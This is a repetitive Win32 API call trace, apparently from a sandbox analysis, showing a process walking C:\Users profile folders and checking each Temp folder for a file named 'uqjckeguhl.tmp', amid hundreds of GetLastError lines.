	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.117] GetLastError () returned 0x3
	[0088.118] GetLastError () returned 0x3
	[0088.118] GetLastError () returned 0x3
	[0088.118] GetLastError () returned 0x3
	[0088.118] GetLastError () returned 0x3
	[0088.118] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0088.118] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.119] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0088.119] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.120] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0088.120] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0088.120] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.122] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0088.122] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.123] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0088.123] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0088.123] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.123] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0088.123] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.123] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0088.124] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0088.124] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.124] wsprintfW (in: param_1=0x69db50, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0088.124] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0088.124] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0
	[0088.124] FindClose (in: hFindFile=0x653638 | out: hFindFile=0x653638) returned 1
	[0088.124] Sleep (dwMilliseconds=0x1388) 
	[0093.515] GetProfilesDirectoryW () returned 0x0
	[0093.522] GetProfilesDirectoryW () returned 0x1
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 0x653638
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.523] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0093.524] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] GetLastError () returned 0x7a
	[0093.524] lstrcmpW (lpString1="..", lpString2=".") returned 1
	[0093.524] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0093.524] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0093.525] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.525] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.526] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.527] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.528] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] GetLastError () returned 0x7a
	[0093.529] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0093.529] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.530] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] GetLastError () returned 0x3
	[0093.531] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0093.531] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.532] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0093.532] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.532] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.533] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] GetLastError () returned 0x3
	[0093.534] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0093.534] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.536] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0093.536] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0093.537] FindNextFileW (in: hFindFile=0x653638, lpFindFileData=0x2aefbe4 | out: lpFindFileData=0x2aefbe4) returned 1
	[0093.537] wsprintfW (in: param_1=0x69f6b8, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
